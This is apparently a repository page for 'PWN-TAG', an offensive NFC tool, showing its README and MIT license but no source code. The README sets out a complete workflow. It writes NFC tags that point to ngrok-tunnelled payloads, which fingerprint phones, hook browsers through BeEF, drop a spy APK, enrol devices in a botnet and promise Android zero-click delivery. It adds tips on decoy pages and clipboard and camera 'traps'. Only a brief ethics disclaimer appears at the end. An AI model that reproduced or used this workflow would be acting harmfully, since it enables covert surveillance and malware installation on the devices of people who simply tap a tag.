← back to reliquary

PWN-TAG_weponized_nfc

8 files

README

PWN-TAG OG this version works best for non paid ngrok accounts

There are 2 branches in this repository:

-the main branch is for no zero click payload
delivery due to no paid ngrok accout.

and the pwn_tag_pro branch allows for android zero click payload delivery with paid ngrok account.

MAKE SURE YOU ARE IN THE RIGHT BRANCH OF THE REPOSITORY BEFORE PROCEEDING. toggle to switch branches found above.

PWN TAG "tag to pwn" — NFC payload delivery system for social engineering, red team ops, and mobile testing.

PWN-TAG lets you write NFC tags that trigger live payloads on mobile devices — from fingerprinting to botnet enrollment. Built for ethical hackers, educators, defenders, and curious minds.

Branches

Branch Purpose
main Free-tier version using randomized ngrok URLs (requires tap + confirm)
ngrok-pro Paid ngrok version with static subdomains → enables zero-click payloads

Switch branches like this:

git checkout ngrok-pro
````

---

##  What You Need

*  NFC tag stickers (\~\$10 for 25):
  [https://a.co/d/gl2XRV8](https://a.co/d/gl2XRV8)

*  NFC writer app (free):
  [https://apps.apple.com/app/id1252962749](https://apps.apple.com/app/id1252962749)

*  A Debian-based Linux system 

*  A [ngrok](https://ngrok.com/) account (free or paid)

---

##  Installation (Clone + Setup)

```bash
git clone https://github.com/ekomsSavior/PWN-TAG.git
cd PWN-TAG

(Optional) Switch to pro version for static subdomain support

git checkout ngrok-pro

Install Python dependencies

sudo apt update
sudo apt install python3 python3-pip -y
pip3 install flask

ngrok Setup

wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/

Then authenticate your token: https://ngrok.com/

ngrok config add-authtoken <YOUR_NGROK_AUTH_TOKEN>

Usage (4 Terminal Workflow)

Terminal 1 — Start Payload Server

python3 -m http.server 8080

This serves your payloads at http://localhost:8080

Terminal 2 — Start ngrok Tunnel

ngrok http 8080

Copy the https://...ngrok.app URL — this becomes your NFC tag link.

Terminal 3 — Edit Payload Redirector

nano payloads/test_shell.html

Update this line with your current ngrok URL:

window.location.href = "https://your-ngrok-subdomain.ngrok.app/payloads/bot_joiner.html";

Terminal 4 — Start Listener

python3 listener.py

Logs any device fingerprinting or interaction data sent by payloads.

Write Your NFC Tag

Using your NFC writer app:

  1. Tap Write
  2. Add Record → URL
  3. Paste something like:
https://pwn-tag.ngrok.app/payloads/test_shell.html
  1. Tap “Write” to encode it

Now when someone taps the tag, it opens the redirector → logs the device → delivers your payload.

Payload Options (Examples & Use Cases)

Payload Path Description
Test Shell payloads/test_shell.html Logs fingerprint (user agent, screen size, timezone) then redirects
Full Beacon Shell payloads/beef_shell.html Loads a BEEF hook for browser control (if server is running)
APK Dropper payloads/spy.apk Sends Android users a direct APK (custom implants welcome)
Rogue Joiner payloads/bot_joiner.html Simulates Rogue Botnet join — connect, beacon, execute JS

Swapping Payloads (Beginner-Friendly)

  1. Open payloads/test_shell.html
  2. Change this line:
window.location.href = "https://your-ngrok.ngrok.app/payloads/YOUR_FILE_HERE";
  1. Example:
window.location.href = "https://pwn-tag.ngrok.app/payloads/spy.apk";

No need to rewrite the NFC tag if you're using a static domain — just update the file.

Pro Tips

  • Make multiple redirectors (redirect_to_apk.html, etc.)
  • Make index.html a 403 decoy or fake blog
  • Want geolocation? Use https://ipinfo.io/json in your JS
  • Want deep traps? Chain to clipboard.js, camlog, etc. before redirect
  • With static domains (ngrok-pro), your NFC tags are reusable forever

Ethical Usage

This tool is intended for educational purposes, red-team ops, and ethical testing only.
You are responsible for your actions. Do not use this on devices or individuals without consent.

source code

files

viewer

select a file
// click a file to view source

license

MIT License Copyright (c) 2026 ek0mssavi0r / Church of Malware Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.
download .zip // inspect all source before execution
Church of Malware · read. become. evolve.